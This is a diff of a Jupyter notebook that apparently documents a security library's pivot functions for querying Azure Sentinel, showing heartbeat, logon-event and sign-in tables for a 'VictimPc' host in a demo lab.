+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>MG</th>\n",
+       "      <th>ManagementGroupName</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>ComputerIP</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>Category</th>\n",
+       "      <th>OSType</th>\n",
+       "      <th>OSName</th>\n",
+       "      <th>OSMajorVersion</th>\n",
+       "      <th>OSMinorVersion</th>\n",
+       "      <th>Version</th>\n",
+       "      <th>SCAgentChannel</th>\n",
+       "      <th>IsGatewayInstalled</th>\n",
+       "      <th>RemoteIPLongitude</th>\n",
+       "      <th>RemoteIPLatitude</th>\n",
+       "      <th>RemoteIPCountry</th>\n",
+       "      <th>SubscriptionId</th>\n",
+       "      <th>ResourceGroup</th>\n",
+       "      <th>ResourceProvider</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>ResourceId</th>\n",
+       "      <th>ResourceType</th>\n",
+       "      <th>ComputerEnvironment</th>\n",
+       "      <th>Solutions</th>\n",
+       "      <th>VMUUID</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>_ResourceId</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>OpsManager</td>\n",
+       "      <td>2020-12-11 00:08:05.427000+00:00</td>\n",
+       "      <td>00000000-0000-0000-0000-000000000001</td>\n",
+       "      <td>AOI-8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>f6638b82-98a5-4542-8bec-6bc0977f793f</td>\n",
+       "      <td>13.89.108.248</td>\n",
+       "      <td>VictimPc.Contoso.Azure</td>\n",
+       "      <td>Direct Agent</td>\n",
+       "      <td>Windows</td>\n",
+       "      <td></td>\n",
+       "      <td>10</td>\n",
+       "      <td>0</td>\n",
+       "      <td>10.20.18040.0</td>\n",
+       "      <td>Direct</td>\n",
+       "      <td>False</td>\n",
+       "      <td>-93.61</td>\n",
+       "      <td>41.6</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>d1d8779d-38d7-4f06-91db-9cbc8de0176f</td>\n",
+       "      <td>DefendTheFlag</td>\n",
+       "      <td>Microsoft.Compute</td>\n",
+       "      <td>VictimPc</td>\n",
+       "      <td>/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourceGroups/DefendTheFlag/providers/Micro...</td>\n",
+       "      <td>virtualMachines</td>\n",
+       "      <td>Azure</td>\n",
+       "      <td>\"behaviorAnalyticsInsights\", \"security\", \"networkMonitoring\", \"dnsAnalytics\", \"securityCenterFre...</td>\n",
+       "      <td>14fa800d-e9b0-4dea-86ac-679933d59253</td>\n",
+       "      <td>Heartbeat</td>\n",
+       "      <td>/subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/defendtheflag/providers/micro...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId SourceSystem  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d   OpsManager   \n",
+       "\n",
+       "                     TimeGenerated                                    MG  \\\n",
+       "0 2020-12-11 00:08:05.427000+00:00  00000000-0000-0000-0000-000000000001   \n",
+       "\n",
+       "                        ManagementGroupName  \\\n",
+       "0  AOI-8ecf8077-cf51-4820-aadd-14040956f35d   \n",
+       "\n",
+       "                       SourceComputerId     ComputerIP  \\\n",
+       "0  f6638b82-98a5-4542-8bec-6bc0977f793f  13.89.108.248   \n",
+       "\n",
+       "                 Computer      Category   OSType OSName OSMajorVersion  \\\n",
+       "0  VictimPc.Contoso.Azure  Direct Agent  Windows                    10   \n",
+       "\n",
+       "  OSMinorVersion        Version SCAgentChannel  IsGatewayInstalled  \\\n",
+       "0              0  10.20.18040.0         Direct               False   \n",
+       "\n",
+       "   RemoteIPLongitude  RemoteIPLatitude RemoteIPCountry  \\\n",
+       "0             -93.61              41.6   United States   \n",
+       "\n",
+       "                         SubscriptionId  ResourceGroup   ResourceProvider  \\\n",
+       "0  d1d8779d-38d7-4f06-91db-9cbc8de0176f  DefendTheFlag  Microsoft.Compute   \n",
+       "\n",
+       "   Resource  \\\n",
+       "0  VictimPc   \n",
+       "\n",
+       "                                                                                            ResourceId  \\\n",
+       "0  /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourceGroups/DefendTheFlag/providers/Micro...   \n",
+       "\n",
+       "      ResourceType ComputerEnvironment  \\\n",
+       "0  virtualMachines               Azure   \n",
+       "\n",
+       "                                                                                             Solutions  \\\n",
+       "0  \"behaviorAnalyticsInsights\", \"security\", \"networkMonitoring\", \"dnsAnalytics\", \"securityCenterFre...   \n",
+       "\n",
+       "                                 VMUUID       Type  \\\n",
+       "0  14fa800d-e9b0-4dea-86ac-679933d59253  Heartbeat   \n",
+       "\n",
+       "                                                                                           _ResourceId  \n",
+       "0  /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/defendtheflag/providers/micro...  "
+      ]
+     },
+     "execution_count": 25,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "host = Host(HostName=\"VictimPc\")\n",
+    "Host.AzureSentinel.get_heartbeat_for_host(host)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 26,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>TargetUserName</th>\n",
+       "      <th>TargetDomainName</th>\n",
+       "      <th>TargetUserSid</th>\n",
+       "      <th>TargetLogonId</th>\n",
+       "      <th>LogonProcessName</th>\n",
+       "      <th>LogonType</th>\n",
+       "      <th>LogonTypeName</th>\n",
+       "      <th>AuthenticationPackageName</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>IpAddress</th>\n",
+       "      <th>WorkstationName</th>\n",
+       "      <th>TimeCreatedUtc</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2020-10-01 22:39:36.987000+00:00</td>\n",
+       "      <td>f6638b82-98a5-4542-8bec-6bc0977f793f</td>\n",
+       "      <td>VictimPc.Contoso.Azure</td>\n",
+       "      <td>VictimPc$</td>\n",
+       "      <td>CONTOSO</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>SYSTEM</td>\n",
+       "      <td>NT AUTHORITY</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>Advapi</td>\n",
+       "      <td>5</td>\n",
+       "      <td>5 - Service</td>\n",
+       "      <td>Negotiate</td>\n",
+       "      <td></td>\n",
+       "      <td>-</td>\n",
+       "      <td>-</td>\n",
+       "      <td>2020-10-01 22:39:36.987000+00:00</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2020-10-01 22:39:37.220000+00:00</td>\n",
+       "      <td>f6638b82-98a5-4542-8bec-6bc0977f793f</td>\n",
+       "      <td>VictimPc.Contoso.Azure</td>\n",
+       "      <td>VictimPc$</td>\n",
+       "      <td>CONTOSO</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>SYSTEM</td>\n",
+       "      <td>NT AUTHORITY</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>Advapi</td>\n",
+       "      <td>5</td>\n",
+       "      <td>5 - Service</td>\n",
+       "      <td>Negotiate</td>\n",
+       "      <td></td>\n",
+       "      <td>-</td>\n",
+       "      <td>-</td>\n",
+       "      <td>2020-10-01 22:39:37.220000+00:00</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2020-10-01 22:39:42.603000+00:00</td>\n",
+       "      <td>f6638b82-98a5-4542-8bec-6bc0977f793f</td>\n",
+       "      <td>VictimPc.Contoso.Azure</td>\n",
+       "      <td>VictimPc$</td>\n",
+       "      <td>CONTOSO</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>SYSTEM</td>\n",
+       "      <td>NT AUTHORITY</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>Advapi</td>\n",
+       "      <td>5</td>\n",
+       "      <td>5 - Service</td>\n",
+       "      <td>Negotiate</td>\n",
+       "      <td></td>\n",
+       "      <td>-</td>\n",
+       "      <td>-</td>\n",
+       "      <td>2020-10-01 22:39:42.603000+00:00</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>CONTOSO\\RonHD</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2020-10-01 22:40:00.957000+00:00</td>\n",
+       "      <td>f6638b82-98a5-4542-8bec-6bc0977f793f</td>\n",
+       "      <td>VictimPc.Contoso.Azure</td>\n",
+       "      <td>VictimPc$</td>\n",
+       "      <td>CONTOSO</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>RonHD</td>\n",
+       "      <td>CONTOSO</td>\n",
+       "      <td>S-1-5-21-1661583231-2311428937-3957907789-1105</td>\n",
+       "      <td>0x117a0f7f</td>\n",
+       "      <td>Advapi</td>\n",
+       "      <td>4</td>\n",
+       "      <td>4 - Batch</td>\n",
+       "      <td>Negotiate</td>\n",
+       "      <td></td>\n",
+       "      <td>-</td>\n",
+       "      <td>VictimPc</td>\n",
+       "      <td>2020-10-01 22:40:00.957000+00:00</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>NT AUTHORITY\\SYSTEM</td>\n",
+       "      <td>4624</td>\n",
+       "      <td>2020-10-01 22:40:14.040000+00:00</td>\n",
+       "      <td>f6638b82-98a5-4542-8bec-6bc0977f793f</td>\n",
+       "      <td>VictimPc.Contoso.Azure</td>\n",
+       "      <td>VictimPc$</td>\n",
+       "      <td>CONTOSO</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>SYSTEM</td>\n",
+       "      <td>NT AUTHORITY</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>Advapi</td>\n",
+       "      <td>5</td>\n",
+       "      <td>5 - Service</td>\n",
+       "      <td>Negotiate</td>\n",
+       "      <td></td>\n",
+       "      <td>-</td>\n",
+       "      <td>-</td>\n",
+       "      <td>2020-10-01 22:40:14.040000+00:00</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId              Account  EventID  \\\n",
+       "0  8ecf8077-cf51-4820-aadd-14040956f35d  NT AUTHORITY\\SYSTEM     4624   \n",
+       "1  8ecf8077-cf51-4820-aadd-14040956f35d  NT AUTHORITY\\SYSTEM     4624   \n",
+       "2  8ecf8077-cf51-4820-aadd-14040956f35d  NT AUTHORITY\\SYSTEM     4624   \n",
+       "3  8ecf8077-cf51-4820-aadd-14040956f35d        CONTOSO\\RonHD     4624   \n",
+       "4  8ecf8077-cf51-4820-aadd-14040956f35d  NT AUTHORITY\\SYSTEM     4624   \n",
+       "\n",
+       "                     TimeGenerated                      SourceComputerId  \\\n",
+       "0 2020-10-01 22:39:36.987000+00:00  f6638b82-98a5-4542-8bec-6bc0977f793f   \n",
+       "1 2020-10-01 22:39:37.220000+00:00  f6638b82-98a5-4542-8bec-6bc0977f793f   \n",
+       "2 2020-10-01 22:39:42.603000+00:00  f6638b82-98a5-4542-8bec-6bc0977f793f   \n",
+       "3 2020-10-01 22:40:00.957000+00:00  f6638b82-98a5-4542-8bec-6bc0977f793f   \n",
+       "4 2020-10-01 22:40:14.040000+00:00  f6638b82-98a5-4542-8bec-6bc0977f793f   \n",
+       "\n",
+       "                 Computer SubjectUserName SubjectDomainName SubjectUserSid  \\\n",
+       "0  VictimPc.Contoso.Azure       VictimPc$           CONTOSO       S-1-5-18   \n",
+       "1  VictimPc.Contoso.Azure       VictimPc$           CONTOSO       S-1-5-18   \n",
+       "2  VictimPc.Contoso.Azure       VictimPc$           CONTOSO       S-1-5-18   \n",
+       "3  VictimPc.Contoso.Azure       VictimPc$           CONTOSO       S-1-5-18   \n",
+       "4  VictimPc.Contoso.Azure       VictimPc$           CONTOSO       S-1-5-18   \n",
+       "\n",
+       "  TargetUserName TargetDomainName  \\\n",
+       "0         SYSTEM     NT AUTHORITY   \n",
+       "1         SYSTEM     NT AUTHORITY   \n",
+       "2         SYSTEM     NT AUTHORITY   \n",
+       "3          RonHD          CONTOSO   \n",
+       "4         SYSTEM     NT AUTHORITY   \n",
+       "\n",
+       "                                    TargetUserSid TargetLogonId  \\\n",
+       "0                                        S-1-5-18         0x3e7   \n",
+       "1                                        S-1-5-18         0x3e7   \n",
+       "2                                        S-1-5-18         0x3e7   \n",
+       "3  S-1-5-21-1661583231-2311428937-3957907789-1105    0x117a0f7f   \n",
+       "4                                        S-1-5-18         0x3e7   \n",
+       "\n",
+       "  LogonProcessName  LogonType LogonTypeName AuthenticationPackageName Status  \\\n",
+       "0         Advapi            5   5 - Service                 Negotiate          \n",
+       "1         Advapi            5   5 - Service                 Negotiate          \n",
+       "2         Advapi            5   5 - Service                 Negotiate          \n",
+       "3         Advapi            4     4 - Batch                 Negotiate          \n",
+       "4         Advapi            5   5 - Service                 Negotiate          \n",
+       "\n",
+       "  IpAddress WorkstationName                   TimeCreatedUtc  \n",
+       "0         -               - 2020-10-01 22:39:36.987000+00:00  \n",
+       "1         -               - 2020-10-01 22:39:37.220000+00:00  \n",
+       "2         -               - 2020-10-01 22:39:42.603000+00:00  \n",
+       "3         -        VictimPc 2020-10-01 22:40:00.957000+00:00  \n",
+       "4         -               - 2020-10-01 22:40:14.040000+00:00  "
+      ]
+     },
+     "execution_count": 26,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "Host.AzureSentinel.list_host_logons(host_name=\"VictimPc\").head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Adding additional parameters\n",
+    "\n",
+    "The example below shows using the host entity as an initial parameter\n",
+    "(Pivot is using the attribute mapping assign the `host_name` function parameter the value of `host.fqdn`).\n",
+    "\n",
+    "The second parameter is a list of event IDs specified explicitly."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "\u001b[1;31mSignature:\u001b[0m \u001b[0mHost\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mAzureSentinel\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mlist_host_events_by_id\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m->\u001b[0m \u001b[0mUnion\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mpandas\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcore\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mframe\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mAny\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+       "\u001b[1;31mDocstring:\u001b[0m\n",
+       "Retrieves list of events on a host\n",
+       "\n",
+       "Parameters\n",
+       "----------\n",
+       "add_query_items: str (optional)\n",
+       "    Additional query clauses\n",
+       "end: datetime\n",
+       "    Query end time\n",
+       "event_list: list (optional)\n",
+       "    List of event IDs to match\n",
+       "    (default value is: has)\n",
+       "host_name: str\n",
+       "    Name of host\n",
+       "host_op: str (optional)\n",
+       "    The hostname match operator\n",
+       "    (default value is: has)\n",
+       "query_project: str (optional)\n",
+       "    Column project statement\n",
+       "start: datetime\n",
+       "    Query start time\n",
+       "table: str (optional)\n",
+       "    Table name\n",
+       "    (default value is: SecurityEvent)\n",
+       "\u001b[1;31mFile:\u001b[0m      c:\\users\\ian\\anaconda3\\envs\\condadev\\lib\\functools.py\n",
+       "\u001b[1;31mType:\u001b[0m      function\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "Host.AzureSentinel.list_host_events_by_id?"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 28,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th>Computer</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>EventID</th>\n",
+       "      <th>Activity</th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>4624</th>\n",
+       "      <th>4624 - An account was successfully logged on.</th>\n",
+       "      <td>520</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4672</th>\n",
+       "      <th>4672 - Special privileges assigned to new logon.</th>\n",
+       "      <td>436</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                          Computer\n",
+       "EventID Activity                                                  \n",
+       "4624    4624 - An account was successfully logged on.          520\n",
+       "4672    4672 - Special privileges assigned to new logon.       436"
+      ]
+     },
+     "execution_count": 28,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "(\n",
+    "    Host.AzureSentinel.list_host_events_by_id( # Pivot query returns DataFrame\n",
+    "        host, event_list=[4624, 4625, 4672]\n",
+    "    )\n",
+    "    [[\"Computer\", \"EventID\", \"Activity\"]] # we could have save the output to a dataframe\n",
+    "    .groupby([\"EventID\", \"Activity\"])     # variable but we can also use pandas\n",
+    "    .count()                              # functions/syntax directly on the output\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Using iterables as parameters to data queries\n",
+    "\n",
+    "Some data queries accept \"list\" items as parameters (e.g. many of the IP queries accept a\n",
+    "list of IP addresses). These work as expected, with a single query calling sending the whole list\n",
+    "as a single parameter."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 29,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "list_alerts_for_ip function\n",
+      "list_aad_signins_for_ip function\n",
+      "list_azure_activity_for_ip function\n",
+      "list_azure_network_flows_by_ip function\n",
+      "list_activity_for_ip function\n",
+      "get_info_by_ipaddress function\n",
+      "list_logons_for_source_ip function\n",
+      "get_host_for_ip function\n",
+      "get_heartbeat_for_ip function\n",
+      "list_indicators function\n",
+      "list_indicators_by_ip function\n",
+      "list_indicators_by_hash function\n",
+      "list_indicators_by_filepath function\n",
+      "list_indicators_by_domain function\n",
+      "list_indicators_by_email function\n",
+      "list_indicators_by_url function\n"
+     ]
+    }
+   ],
+   "source": [
+    "ip_list = [\n",
+    "    \"203.23.68.64\",\n",
+    "    \"67.10.68.45\",\n",
+    "    \"182.69.173.164\",\n",
+    "    \"79.176.167.161\",\n",
+    "    \"167.220.197.230\",\n",
+    "]\n",
+    "\n",
+    "IpAddress.AzureSentinel()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 30,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "\u001b[1;31mSignature:\u001b[0m \u001b[0mIpAddress\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mAzureSentinel\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mlist_aad_signins_for_ip\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m->\u001b[0m \u001b[0mUnion\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mpandas\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcore\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mframe\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mDataFrame\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mAny\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+       "\u001b[1;31mDocstring:\u001b[0m\n",
+       "Lists Azure AD Signins for an IP Address\n",
+       "\n",
+       "Parameters\n",
+       "----------\n",
+       "add_query_items: str (optional)\n",
+       "    Additional query clauses\n",
+       "end: datetime (optional)\n",
+       "    Query end time\n",
+       "ip_address_list: list\n",
+       "    The IP Address or list of Addresses\n",
+       "start: datetime (optional)\n",
+       "    Query start time\n",
+       "    (default value is: -5)\n",
+       "table: str (optional)\n",
+       "    Table name\n",
+       "    (default value is: SigninLogs)\n",
+       "\u001b[1;31mFile:\u001b[0m      c:\\users\\ian\\anaconda3\\envs\\condadev\\lib\\functools.py\n",
+       "\u001b[1;31mType:\u001b[0m      function\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "IpAddress.AzureSentinel.list_aad_signins_for_ip?"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 31,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>ResourceId</th>\n",
+       "      <th>OperationName</th>\n",
+       "      <th>OperationVersion</th>\n",
+       "      <th>Category</th>\n",
+       "      <th>ResultType</th>\n",
+       "      <th>ResultSignature</th>\n",
+       "      <th>ResultDescription</th>\n",
+       "      <th>DurationMs</th>\n",
+       "      <th>CorrelationId</th>\n",
+       "      <th>Resource</th>\n",
+       "      <th>ResourceGroup</th>\n",
+       "      <th>ResourceProvider</th>\n",
+       "      <th>Identity</th>\n",
+       "      <th>Level</th>\n",
+       "      <th>Location</th>\n",
+       "      <th>AlternateSignInName</th>\n",
+       "      <th>AppDisplayName</th>\n",
+       "      <th>AppId</th>\n",
+       "      <th>AuthenticationDetails</th>\n",
+       "      <th>AuthenticationMethodsUsed</th>\n",
+       "      <th>AuthenticationProcessingDetails</th>\n",
+       "      <th>AuthenticationRequirement</th>\n",
+       "      <th>...</th>\n",
+       "      <th>IsRisky</th>\n",
+       "      <th>LocationDetails</th>\n",
+       "      <th>MfaDetail</th>\n",
+       "      <th>NetworkLocationDetails</th>\n",
+       "      <th>OriginalRequestId</th>\n",
+       "      <th>ProcessingTimeInMilliseconds</th>\n",
+       "      <th>RiskDetail</th>\n",
+       "      <th>RiskEventTypes</th>\n",
+       "      <th>RiskEventTypes_V2</th>\n",
+       "      <th>RiskLevelAggregated</th>\n",
+       "      <th>RiskLevelDuringSignIn</th>\n",
+       "      <th>RiskState</th>\n",
+       "      <th>ResourceDisplayName</th>\n",
+       "      <th>ResourceIdentity</th>\n",
+       "      <th>ServicePrincipalId</th>\n",
+       "      <th>ServicePrincipalName</th>\n",
+       "      <th>Status</th>\n",
+       "      <th>TokenIssuerName</th>\n",
+       "      <th>TokenIssuerType</th>\n",
+       "      <th>UserAgent</th>\n",
+       "      <th>UserDisplayName</th>\n",
+       "      <th>UserId</th>\n",
+       "      <th>UserPrincipalName</th>\n",
+       "      <th>AADTenantId</th>\n",
+       "      <th>Type</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>8ecf8077-cf51-4820-aadd-14040956f35d</td>\n",
+       "      <td>Azure AD</td>\n",
+       "      <td>2020-10-01 10:02:18.923000+00:00</td>\n",
+       "      <td>/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam</td>\n",
+       "      <td>Sign-in activity</td>\n",
+       "      <td>1.0</td>\n",
+       "      <td>SignInLogs</td>\n",
+       "      <td>0</td>\n",
+       "      <td>None</td>\n",
+       "      <td></td>\n",
+       "      <td>0</td>\n",
+       "      <td>ac81524b-bb83-4a0a-a3f8-577a14dda295</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td>Microsoft.aadiam</td>\n",
+       "      <td></td>\n",
+       "      <td>Brandon</td>\n",
+       "      <td>4</td>\n",
+       "      <td>US</td>\n",
+       "      <td></td>\n",
+       "      <td>Azure Advanced Threat Protection</td>\n",
+       "      <td>7b7531ad-5926-4f2d-8a1d-38495ad33e17</td>\n",
+       "      <td>[]</td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"key\": \"IsCAEToken\",\\r\\n    \"value\": \"False\"\\r\\n  }\\r\\n]</td>\n",
+       "      <td>singleFactorAuthentication</td>\n",
+       "      <td>...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{'city': 'Lewisville', 'state': 'Texas', 'countryOrRegion': 'US', 'geoCoordinates': {'latitude':...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>c2bcb991-75ad-42f4-a6c0-1a90686dfd00</td>\n",
+       "      <td>210</td>\n",
+       "      <td>none</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>[]</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
+       "      <td>none</td>\n",
